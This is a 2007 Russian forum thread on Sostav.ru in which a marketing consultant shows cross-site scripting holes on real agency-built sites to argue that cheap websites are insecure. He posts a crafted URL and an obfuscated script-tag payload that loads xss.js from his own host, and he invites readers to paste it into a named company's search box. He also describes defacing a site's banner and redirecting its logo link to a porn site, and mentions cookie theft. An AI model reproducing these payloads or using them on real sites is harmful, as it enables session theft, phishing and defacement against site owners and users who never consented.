Слово и фраза: Искать: Сортировать по:
Форумы на Sostav.ru / Интернет-маркетинг / Для рекламистов о качестве сайтов.
Ответ анонимам с adlife.spb.ru

Profile
Микромаркетинг©
Алексей Новиков
Повышаем эффективность сайтов
Постов: 416
Дата регистрации: 18.10.2006
В продолжение недавней истории о сайте «Максидома». (http://adlife.spb.ru/blog/?pageid=2&blog=103894&id=115415) Краткое содержание предыдущей серии: вместо того, чтобы признать дефект на сайте, Общество Анонимных Комментаторов поставило под сомнение справедливость моих слов (и еще много чего другого). Мол, вывели на страницу слово «ой», так это дальше ничем не грозит.

Специально для вас, уважаемые читатели, я подготовил более наглядную демонстрацию того, к чему может привести недостаточная квалификация или лень разработчиков. За примерами ходить далеко не пришлось. Вы догадываетесь, в чьем портфолио я достал пару сайтов для экзекуции? Это было нетрудно.
Нажмите на ссылку и подождите секунд пять. Остальное прочитаете уже там. Потом вернитесь сюда и дочитайте текст до конца.

http://www.creative-industries.spb.ru/pa...v.ru%2Fxss%2Fxss.js%3E%3C%2Fscript%3E

Какое отношение это имеет к рекламе?

Имеет. Точно такое же, какое имеют к рекламе (и не только) сайты и интернет вообще. У кого-то сомнения?
Во-первых, рекламные агентства частенько заказывают сайты субподрядчикам или даже сами делают их. В лучшем случае это будет «полиграфическая болезнь», когда сайт похож на буклет и нефункционален. А что, у нас же есть свои дизайнеры, какая разница: сайт или флаер?

Во-вторых, рекламодатели заказывают сайты и недоумевают, когда им озвучивают цифру в несколько тысяч у.е. Зачем платить 4000 долларов, когда есть конторки, массово штампующие такие сайты по штуке баксов? У некоторых в портфолио бывают довольно известные заказчики (как они туда угодили, другой вопрос).

У большинства клиентов или рекламных агентств нет осознания, за что платить 4000 баксов, заказывая сайт: «Вот листовок напечатать или щит у дороги заказать, это понятно. А сайт не пощупаешь. Да что там мудрить, каждый школьник ведь себе сайт уже сделал. И ваще, нам ентот интырнет тока для галочки, потому что на визитке напечатано».

При этом находятся люди, утверждающие, что «ничего страшного» и задающие вопросы «а чем плох данный сайт». Да, пока у вас не похитили пароль, базу клиентов, не разослали с вашего сайта спам или вирусы, то ничего страшного ? Можете продолжать называть это «функциональностью, недоступной моему пониманию», или принимать это за «вирусный маркетинг», это нынче модно.

Когда идет обсуждение вывески, читатели AdLife знают про щели, образующиеся на стыках при перепаде температур. Но почему-то, когда показывают щели в интернет-сайтах, появляются вопросы: «А чем это плохо?»

Добавки?
Хотите узнать, как выявить подобные уязвимости на своем сайте? Тогда продолжим. Есть в Питере известная IT-компания Ramec. Откройте в новом окне ссылку http://www.ramec.ru. Введите в строку поиска нижеследующий текст и нажмите Enter, да подождите секунд пять ;)


< script src="h**p://drnovikov.ru/ramec/xss.js">< /script>

(Уберите пробелы перед "script" и "/script" и замените "*" на "t")

Догадаетесь с трех раз, кто творец? Подсказка скрыта в коде страницы.

Перед тем, как комментировать, ознакомьтесь с альтернативными источниками, в которых подробно описано, почему это не «функциональность», а уязвимость аж с 1997 года:

http://team-madalf.com/index.php?act=Print&client=printer&f=42&t=7739
http://cf-team.net/content/view/15/30/
http://www.cgisecurity.com/articles/xss-faq.shtml

Ситуация, когда посторонний может запустить на страницах вашего сайта чужеродный скрипт, недопустима! И обсуждать тут нечего.

Надеюсь, теперь рекламисты будут уделять побольше внимания вопросам качества сайтов, в том числе их безопасности.
--------
»»» Блог об интернете, маркетинге, рекламе и PR своими руками «««
+ Препарируем ваши сайты

Да 0 Нет 0
Пользователь в OffLine Послать приватное сообщение Добавить пользователя в список друзей Сайт пользователя 12.02.2007 14:56
цитата
Profile
VAKh©
ex Swayvill
Постов: 1630
Дата регистрации: 16.04.2004
что-то с кодом в поиске ничего не получилось..

+ вопрос: каким образом можно обезопаситься от этого, или для начала, как обнаружить, что брешь имеется?
--------
"Жила-была четвероногая ворона. Собственно говоря, у нее было пять ног, но об этом
говорить не стоит." (c) Д.Хармс

Да 0 Нет 0
Пользователь в OffLine Послать приватное сообщение Добавить пользователя в список друзей 12.02.2007 15:19
цитата
Profile
Микромаркетинг©
Алексей Новиков
Повышаем эффективность сайтов
Постов: 416
Дата регистрации: 18.10.2006
С кодом -- на ramec.ru уже залатали.

Еще я сегодня с согласия Aldife.spb.ru поменяли им на короткое время логотип и поставил с него ссылку на сиськи-сайт.
Обнаружить можно, например, подставляя такую строку в разные поля формы. Впрочем, для Adlife мне пришлось применить другую тактику.

Обезопаситься -- это уже к программистам. Я не программер, эти штуки делаю примерно с пятницы :) Но если даже я (хирург по образованию, работающий консультантом по интернет-маркетингу), смог, то и хакеры точно смогут. А ведь еще есть масса уязвимостей, о которых я-то толком не знаю.

Полагаю, надо просто заказывать внешний аудит безопасности сайта и предусматривать в договоре сроки бесплатного исправления.
--------
»»» Блог об интернете, маркетинге, рекламе и PR своими руками «««
+ Препарируем ваши сайты

Да 0 Нет 0
Пользователь в OffLine Послать приватное сообщение Добавить пользователя в список друзей Сайт пользователя 12.02.2007 15:47
цитата
Profile
Микромаркетинг©
Алексей Новиков
Повышаем эффективность сайтов
Постов: 416
Дата регистрации: 18.10.2006
Поразительно! Спустя несколько лет и несколько часов они залатали-таки дыры. Для тех, кто не успел на концерт: при заходе на эти сайты по сформированной мною ссылке люди видели вот это: http://drnovikov.ru/xss/

Кстати, на первом сайте по-прежнему висит видимая глазом орфографическая ошибка. Надо полагать, с самого 2004 года там написано "creStive" вместо "creative"

Copyright: 2004 Crestive Industries Development Center

Браво!

Сколько еще сайтов за 100 баксов надо распять, чтобы народ пошевелился? :)
--------
»»» Блог об интернете, маркетинге, рекламе и PR своими руками «««
+ Препарируем ваши сайты

Да 0 Нет 0
Пользователь в OffLine Послать приватное сообщение Добавить пользователя в список друзей Сайт пользователя 12.02.2007 15:57
цитата
Profile
pelvis©
CMS Maker
Постов: 2504
Дата регистрации: 24.11.2005
для: Микромаркетинг© на самом деле, ошибка не критичная для уязвимости.
--------
Schnabl изделия для СКС. Выстраиваем продажи.
Производство светодиодных светильников для вашего офиса. Берегите зрение!

Да 0 Нет 0
Пользователь в OffLine Послать приватное сообщение Добавить пользователя в список друзей Сайт пользователя 12.02.2007 16:05
цитата
Profile
Микромаркетинг©
Алексей Новиков
Повышаем эффективность сайтов
Постов: 416
Дата регистрации: 18.10.2006
Pelvis, посмотрите в тех статьях, ссылки на которые я дал. Вы считаете, что спереть cookies у админа и получить доступ к сайту не критично? Или подставить юзерам ложную страницу, да собрать у них логины-пароли, пин-коды, номера кредиток?
--------
»»» Блог об интернете, маркетинге, рекламе и PR своими руками «««
+ Препарируем ваши сайты

Да 0 Нет 0
Пользователь в OffLine Послать приватное сообщение Добавить пользователя в список друзей Сайт пользователя 12.02.2007 16:43
цитата
Profile
AAZ©
Arbeit macht frei
Модератор
Постов: 7061
Дата регистрации: 04.03.2005
для: Микромаркетинг©
Забавная фича Теперь я понял, что имел ввиду Cossack, когда года три назад говорил, что нашел способ получать безответные ссылки с сайтов помимо их желания

Это работает только в строке поиска или еще и в полях отправки форм запросов или страниц адурла?
--------
разработка сайтов, продвижение товаров и услуг через интернет
____________

"Среди простых людей уже давно ходят слухи о продажности поисковиками тех самых выдач и топов." (с) Savl

Да 0 Нет 0
Пользователь в OffLine Послать приватное сообщение Добавить пользователя в список друзей Сайт пользователя 12.02.2007 19:26
цитата
Profile
Микромаркетинг©
Алексей Новиков
Повышаем эффективность сайтов
Постов: 416
Дата регистрации: 18.10.2006
Это работает там, где движок сайта позволяет вывести на страницу введенные посетителем данные без их обработки. Судя по литературе, есть 2 типа XSS-атак. Непостоянная атака, когда мне надо кинуть админу особый URL и постоянная, например, если я в гостевухе смогу такое вывести. Пользователи не будут даже предполагать, что их куки кто-то заботливо собирает. :-)

Собственно, такую возможность я обнаружил на самом Adlife и устроил демонстрацию (предварительно позвонив им и известив). Поменял им баннер на свой, а ссылку с логотипа поставил на сиськи-сайт :-) Шороху у них было, говорят...

Хотите знать, что ответил мне некто, подписавшийся "Владимир Воскресенский" (так же зовут гендиректора конторы, сделавшей сайт Максидому и эти два сайта, которые я показал).

Вот его слова: «Вы весьма невнимательны (либо СПЕЦИАЛЬНО НЕВНИМАТЕЛЬНЫ) - иначе бы обратили внимание на то. что система урпавления сайтом, установленная web-студией интернет-агентства "В*****" в этот сайт позволяет специалистам "М********" ПОЛНОСТЬЮ управлять не только содержанием, но и ФУНКЦИОНАЛЬНОСТЬЮ САЙТА, и эта функциональность, видимо недоступна восприятию некоторых "экспертов"...»

Проще говоря, это не брак, а недоступная мне, неучу, функциональность. Стоит отметить: большинство рекламистов действительно не понимают, что это — потенциальная опасность. Кто-то даже утверждал, будто это «вирусный маркетинг».

Впрочем, надо там коменты смотреть, рекламисты и анонимы жгут: http://adlife.spb.ru/blog/?pageid=2&blog=103894&id=115415
--------
»»» Блог об интернете, маркетинге, рекламе и PR своими руками «««
+ Препарируем ваши сайты

Да 0 Нет 0
Пользователь в OffLine Послать приватное сообщение Добавить пользователя в список друзей Сайт пользователя 12.02.2007 20:21
цитата
Profile
pelvis©
CMS Maker
Постов: 2504
Дата регистрации: 24.11.2005
На самом деле, куки у юзверей можно и через флэш-анимацию стянуть. Конечно же, надо всегда защищать сайт, что наши программисты и делают в первую очередь (к слову, я от них остаю и не всегда успеваю новые проекты роботсом закрыть)
--------
Schnabl изделия для СКС. Выстраиваем продажи.
Производство светодиодных светильников для вашего офиса. Берегите зрение!

Да 0 Нет 0
Пользователь в OffLine Послать приватное сообщение Добавить пользователя в список друзей Сайт пользователя 13.02.2007 20:03
цитата
Profile
ARtBAITer©

Постов: 605
Дата регистрации: 02.03.2004
А в чем пафос?
Сайты за 4000 избавлены от недостатков?
Да дыры постоянно находятся в любом ПО. Это данность.
--------
дизайнеры-маркетологи

Да 0 Нет 0
Пользователь в OffLine Послать приватное сообщение Добавить пользователя в список друзей Сайт пользователя 14.02.2007 12:17
цитата
Profile
Микромаркетинг©
Алексей Новиков
Повышаем эффективность сайтов
Постов: 416
Дата регистрации: 18.10.2006
Ауди за 70000 тоже не полностью избавлены от недостатков, но в них недостатков куда меньше, чем в "десятках", правда?

Дыры есть в любом ПО, согласен. Взломать можно любую дверь, так что, теперь ставить самые дешевые? Дверь с замком взломать тяжелее ;)
--------
»»» Блог об интернете, маркетинге, рекламе и PR своими руками «««
+ Препарируем ваши сайты

Да 0 Нет 0
Пользователь в OffLine Послать приватное сообщение Добавить пользователя в список друзей Сайт пользователя 15.02.2007 14:48
цитата
В настоящий момент эту тему просматривают: участников - 0, гостей - 6.
Только зарегистрированные пользователи могут оставлять сообщения в этом форуме


Форумы на Sostav.ru / Интернет-маркетинг / Для рекламистов о качестве сайтов.
© "ООО Состав.ру" 1998-2024

тел/факс: +7 495 225 1331 адрес: 109004, Москва, Пестовский пер., д. 16, стр. 2

При использовании материалов портала ссылка на Sostav.ru обязательна!
Администрация Sostav.ru просит Вас сообщать о всех замеченных технических неполадках на E-mail
Rambler's Top100   18+   Словарь маркетинговых терминов